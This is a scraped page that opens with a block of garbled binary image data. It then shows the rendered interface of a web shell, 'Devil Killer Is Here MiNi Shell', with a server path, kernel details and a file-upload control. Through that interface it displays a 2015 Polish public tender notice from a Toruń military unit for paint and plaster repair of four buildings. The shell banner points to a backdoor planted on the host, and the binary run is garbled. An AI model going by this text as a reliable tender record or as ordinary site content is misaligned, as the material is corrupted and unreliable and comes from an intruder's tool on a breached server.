JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150911/134879-N-2015.html

<p class="kh_header"><b>Toruń: KONSERWACJA POWŁOK MALARSKICH Z NAPRAWĄ TYNKÓW ŚCIAN WEWNĘTRZNYCH I ELEWACJI W KOMPLEKSIE WOJSKOWYM PRZY UL. SOBIESKIEGO W TORUNIU - BUDYNKI NR 14, 23, 36, 38</b><br>
<b>Numer ogłoszenia: 134879 - 2015; data zamieszczenia: 11.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4620 , ul. Okólna 37, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 653 36 94, faks 56 653 36 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.12wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA POWŁOK MALARSKICH Z NAPRAWĄ TYNKÓW ŚCIAN WEWNĘTRZNYCH I ELEWACJI W KOMPLEKSIE WOJSKOWYM PRZY UL. SOBIESKIEGO W TORUNIU - BUDYNKI NR 14, 23, 36, 38.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Konserwacja powłok malarskich z naprawą tynków ścian wewnętrznych i elewacji 
w kompleksie wojskowym przy ul. Sobieskiego w Toruniu - budynki nr 14, 23, 36, 38 
2.	Zakres robót w budynku nr 14: 
2.1.	Naprawa i uzupełnienie istniejących tynków wewnętrznych z zaprawy cementowo-wapiennej kat. III;
2.2.	Oczyszczenie powierzchni ścian i sufitów z zeskrobaniem farb, ewentualnym usunięciem pleśni, grzybów, alg itp.;
2.3.	Zagruntowanie podłoża z przygotowaniem powierzchni z poszpachlowaniem nierówności (sfalowań) powierzchni tynku;
2.4.	Uzupełnienie gładzi gipsowych na ścianach i sufitach;
2.5.	Malowanie farbą akrylową z gruntowaniem środkiem gruntującym wewnętrznych podłoży - sufity 
i ściany;
2.6.	Malowanie ze szpachlowaniem ścian farbą olejną wraz z przygotowaniem podłoża;
2.7.	Malowanie elementów stalowych farbą ftalową do powierzchni metalowych;
2.8.	Wywiezienie i utylizacja materiałów rozbiórkowych;
3.	Zakres robót w budynku nr 23:
3.1.	Oczyszczenie i zmycie istniejącego podłoża;
3.2.	Zabezpieczenie okien folią budowlaną osłonową;
3.3.	Naprawa i uzupełnienie istniejących tynków zewnętrznych z zaprawy cementowo-wapiennej kat. III;
3.4.	Oczyszczenie powierzchni ścian i sufitów z zeskrobaniem farb, ewentualnym usunięciem pleśni, grzybów, alg itp.;
3.5.	Zagruntowanie podłoża z przygotowaniem powierzchni z poszpachlowaniem nierówności (sfalowań) powierzchni tynku;
3.6.	Wykonanie ręczne cienkowarstwowej wyprawy z tynku mineralnego o fakturze kamyczkowej ziarno 1,5mm;
3.7.	Zagruntowanie i malowanie tynków zewnętrznych farbą silikonową elewacyjną;
3.8.	Malowanie stolarki okiennej i drzwiowej farbą olejną wraz z przygotowaniem podłoża (zeskrobaniem łuszczącej się farby, podszpachlowaniem, repereracją rys i uszkodzeń, gruntowaniem);
3.9.	Malowanie elementów stalowych farbą ftalową do powierzchni metalowych;
3.10.	Montaż, demontaż i praca rusztowań zewnętrznych wraz z wykonaniem osłon z siatki;
3.11.	Wywiezienie i utylizacja materiałów rozbiórkowych;
3.12.	Wymiana obróbek blacharskich (pasy nadrynnowe, rynny i rury spustowe) z blachy ocynkowanej gr. 0,55mm;
3.13.	Wymiana parapetów zewnętrznych z blachy ocynkowanej powlekanej gr.0,55-0,6mm.
UWAGA!
W kosztorysie ofertowym należy uwzględnić potrącenie z obliczonej wartości kosztów pozyskanych ze sprzedaży złomu stalowego, tj. 820kg*0,34 zł/kg=278,80 zł.
4.	Zakres robót w budynku nr 36:
4.1.	Naprawa i uzupełnienie istniejących tynków wewnętrznych z zaprawy cementowo-wapiennej kat. III;
4.2.	Oczyszczenie powierzchni ścian i sufitów z zeskrobaniem farb, ewentualnym usunięciem pleśni, grzybów, alg itp.;
4.3.	Zagruntowanie podłoża z przygotowaniem powierzchni z poszpachlowaniem nierówności (sfalowań) powierzchni tynku;
4.4.	Uzupełnienie gładzi gipsowych na ścianach i sufitach;
4.5.	Malowanie farbą akrylową z gruntowaniem środkiem gruntującym wewnętrznych podłoży - sufity i ściany;
4.6.	Malowanie z szpachlowaniem ścian farbą olejną wraz z przygotowaniem podłoża (zeskrobaniem łuszczącej się farby, poszpachlowaniem, reperacją rys i uszkodzeń, gruntowaniem);
4.7.	Malowanie elementów stalowych farbą ftalową do powierzchni metalowych;
4.8.	Zabezpieczenie podłóg podczas malowania folia budowlaną;
4.9.	Wywiezienie i utylizacja materiałów rozbiórkowych.
UWAGA!
W kosztorysie ofertowym należy uwzględnić potrącenie z obliczonej wartości kosztów pozyskanych ze sprzedaży złomu stalowego, tj. 436kg*0,34 zł/kg=148,24 zł.
5.	Zakres robót w budynku nr 38:
5.1.	Naprawa i uzupełnienie istniejących tynków wewnętrznych z zaprawy cementowo-wapiennej kat. III;
5.2.	Oczyszczenie powierzchni ścian i sufitów z zeskrobaniem farb, ewentualnym usunięciem pleśni, grzybów, alg itp.;
5.3.	Zagruntowanie podłoża z przygotowaniem powierzchni z poszpachlowaniem nierówności (sfalowań) powierzchni tynku;
5.4.	Uzupełnienie gładzi gipsowych na ścianach i sufitach;
5.5.	Malowanie farbą akrylową z gruntowaniem środkiem gruntującym wewnętrznych podłoży - 
sufity i ściany;
5.6.	Malowanie z szpachlowaniem ścian farbą olejną wraz z przygotowaniem podłoża (zeskrobaniem łuszczącej się farby, podszpachlowaniem, reperacją rys i uszkodzeń, gruntowaniem);
5.7.	Malowanie elementów stalowych farbą ftalową do powierzchni metalowych;
5.8.	Zabezpieczenie podłóg podczas malowania folią budowlaną;
5.9.	Wywiezienie i utylizacja materiałów rozbiórkowych.
6.	Szczegółowy opis przedmiotu zamówienia określają: specyfikacje techniczne wykonania i odbioru robót, przedmiary robót.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, tj. robót budowlanych w zakresie określonym w przedmiarze robót</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.44.30.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda w niniejszym postępowaniu wniesienia wadium w wysokości:
Część nr 1 - 2 800 zł., część nr 2 - 2 000 zł., część nr 3 - 1 800 zł., cześć nr 4 - 2 600 zł.
2. Wadium można wnieść w formie i na zasadach zgodnych z art. 45 Ustawy.
3. Wadium wnoszone w pieniądzu musi mieć formę przelewu bankowego na konto 
NBP 42 1010 1078 0104 3213 9120 0000. Przelew musi nastąpić w takim terminie, aby cała kwota wadium była na koncie Zamawiającego przed upływem terminu składania ofert. W tytule przelewu należy wpisać: Wadium do postępowania P/54/IW/15, nr części. 
4. Wadium wnoszone w innej formie niż pieniężna należy zdeponować w Kancelarii Jawnej 12 WOG, bud. nr 97, pokój nr 11, w godz. od 700 do 1500 w dniach od poniedziałku do piątku, nie później niż w terminie składania ofert. Wniesione wadium należy opisać jak tytuł przelewu w pkt 3. 	Wadium wniesione w inne formie niż w pieniądzu musi posiadać zapisy o bezwarunkowym, nieodwołalnym zobowiązaniu wypłaty całej kwoty zabezpieczenia oferty, na pierwsze pisemne żądanie Zamawiającego, bez żadnych warunków i zastrzeżeń.
5. Wykonawca zobowiązany jest zabezpieczyć ofertę jedną z form wadium na cały okres związania ofertą.
6. Wykonawca, którego oferta nie będzie zabezpieczona wadium, zostanie przez Zamawiającego wykluczony z postępowania na podstawie art. 24 ust. 2 pkt 2 Ustawy.
7. Zwrot wadium nastąpi na zasadach określonych w art. 46 Ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od określania szczegółowego warunku w tym zakresie.
Spełnienie warunku ocenione zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał doświadczenie w wykonywaniu robót ogólnobudowlanych oraz wykonał minimum dwie roboty o wartości co najmniej 150 000,00 zł brutto każda, wykonane w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie, potwierdzone dowodami, że zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Spełnienie warunku ocenione zostanie na podstawie złożonego oświadczenia i odpowiednich dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od określania szczegółowego warunku w tym zakresie.
Spełnienie warunku ocenione zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobą posiadającą (osobami posiadającymi) uprawnienia budowlane do kierowania przedmiotowymi robotami budowlanymi, wydanymi na podstawie rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578) lub inne odpowiednie, wydane na podstawie wcześniej obowiązujących przepisów oraz przynależeć do właściwej izby samorządu zawodowego, tj. zrzeszonych w Okręgowej Izbie Inżynierów Budownictwa, na każdą funkcję wymienioną poniżej:
a) co najmniej jedna osoba na stanowisko kierownika budowy posiadająca uprawnienia budowlane wydane na podstawie rozporządzenia Ministra Transportu i Budownictwa 
z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578) lub inne odpowiednie, wydane na podstawie wcześniej obowiązujących przepisów.
Do dnia zawarcia umowy wybrany Wykonawca zobowiązany będzie do dostarczenia kopii uprawnień i kwalifikacji dla ww. osób przewidzianych do realizacji przedmiotu zamówienia.
Spełnienie warunku ocenione zostanie na podstawie złożonego oświadczenia i odpowiednich dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 300 000,00 zł.
Spełnienie warunku ocenione zostanie na podstawie złożonego oświadczenia i odpowiednich dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w zakresie i okolicznościach podanych poniżej:
1.1. Zmiana terminu wykonania umowy może nastąpić w przypadku:
1.1.1. wystąpienia siły wyższej, przez którą należy rozumieć zdarzenie bądź połączenie zdarzeń zewnętrznych, obiektywnie niezależnych od Zamawiającego lub Wykonawcy, które zasadniczo i istotnie uniemożliwiają wykonywanie części lub całości zobowiązań wynikających z umowy, których nie można było przewidzieć i którym ani Zamawiający, ani Wykonawca nie mogli zapobiec ani im przeciwdziałać;
1.1.2. działania osób trzecich albo innych zdarzeń, które uniemożliwiają wykonanie części lub całości zobowiązań wynikających z umowy w terminie lub mogących negatywnie wpływać na jakość wykonywanych robót;
1.1.3. konieczności wykonania dodatkowych uzgodnień, badań, ekspertyz, analiz itp.;
1.1.4. ujawnienia w trakcie robót urządzeń, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z dokumentacji robót;
1.1.5. konieczności wykonania zamówień dodatkowych;
1.1.6. wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego;
1.1.7. nieterminowego przekazania terenu budowy przez Zamawiającego z przyczyn niezależnych od Wykonawcy.
1.2. Zmiana zakresu rzeczowego robót może nastąpić w przypadku:
1.2.1. konieczności wykonania robót zamiennych;
1.2.2. konieczności wykonania prac wynikających z zaleceń organów uprawnionych np. nadzoru budowlanego, PIP i innych;
1.2.3. ograniczenia zakresu robót wynikającego z wprowadzenia istotnych lub nieistotnych w rozumieniu Prawa budowlanego zmian w dokumentacji robót.
1.3. Zmiana wynagrodzenia Wykonawcy (ceny podanej w ofercie) może nastąpić w przypadku:
1.3.1. zmiany (zmniejszenia) zakresu zamówienia, wynikającej z wprowadzenia istotnych lub nieistotnych w rozumieniu Prawa budowlanego zmian w dokumentacji robót;
1.3.2. konieczności wykonania robót zamiennych;
1.3.3. zwiększenia lub zmniejszenia ilości robót wynikającego z rzeczywistych obmiarów.
1.4. Inne zmiany:
1.4.1. zmiany adresu firmy, w przypadku poinformowania Zamawiającego o zaistniałej zmianie;
1.4.2. zmiany osób funkcyjnych wyznaczonych do: kierowania robotami, nadzorowania robót, współdziałania przy realizacji umowy;
1.4.3. zmiany podwykonawców w przypadku: wprowadzenia podwykonawcy, rezygnacji z podwykonawcy, zmiany zakresu prac wykonywanych przez podwykonawcę.
2.	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.12wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 12 WOJSKOWY ODDZIAŁ GOSPODARCZY (12 WOG) 87-100 Toruń ul. Okólna 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2015 godzina 10:30, miejsce: 12 WOG, 87-100 Toruń, ul. Okólna 37 w Kancelarii Jawnej w bud. nr 97 pok. nr 11, w dni robocze od poniedziałku do piątku w godzinach od 7.00 do 15.00 lub przesłać pocztą na adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> budynek nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja powłok malarskich z naprawą tynków ścian wewnętrznych i elewacji 
w kompleksie wojskowym przy ul. Sobieskiego w Toruniu budynek nr 14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.44.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> budynek nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja powłok malarskich z naprawą tynków ścian wewnętrznych i elewacji 
w kompleksie wojskowym przy ul. Sobieskiego w Toruniu budynek nr 23.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.44.30.00-4.</p></li>
